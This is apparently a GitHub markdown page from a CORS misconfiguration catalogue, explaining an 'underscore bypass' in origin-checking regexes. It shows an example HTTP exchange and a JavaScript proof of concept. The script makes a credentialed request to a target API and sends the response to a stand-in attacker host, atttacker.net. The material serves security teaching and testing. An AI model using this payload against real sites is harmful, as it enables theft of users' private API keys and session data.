Skip to content

Latest commit

 

History

History
39 lines (30 loc) · 972 Bytes

UNDERSCORE_BYPASS.md

File metadata and controls

39 lines (30 loc) · 972 Bytes
Raw

Underscore Bypass

Description

The regex used for origin verification contains an underscore (_) character.

wwww.example.com trusts www.sub_example.com, which could be an attacker's domain.

Severity: High

Exploit

If the target is sub.example.com, make requests from sub_example.com.

Example

Vulnerable Implementation

GET /endpoint HTTP/1.1
Host: api.example.com
Origin: https://sub_example.com

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://sub_example.com
Access-Control-Allow-Credentials: true 

{"[private API key]"}

Exploit
This exploit requires that the respective JS script is hosted at sub_example.com

var req = new XMLHttpRequest(); 
req.onload = reqListener; 
req.open('get','https://api.example.com/endpoint',true); 
req.withCredentials = true;
req.send();

function reqListener() {
    location='//atttacker.net/log?key='+this.responseText; 
};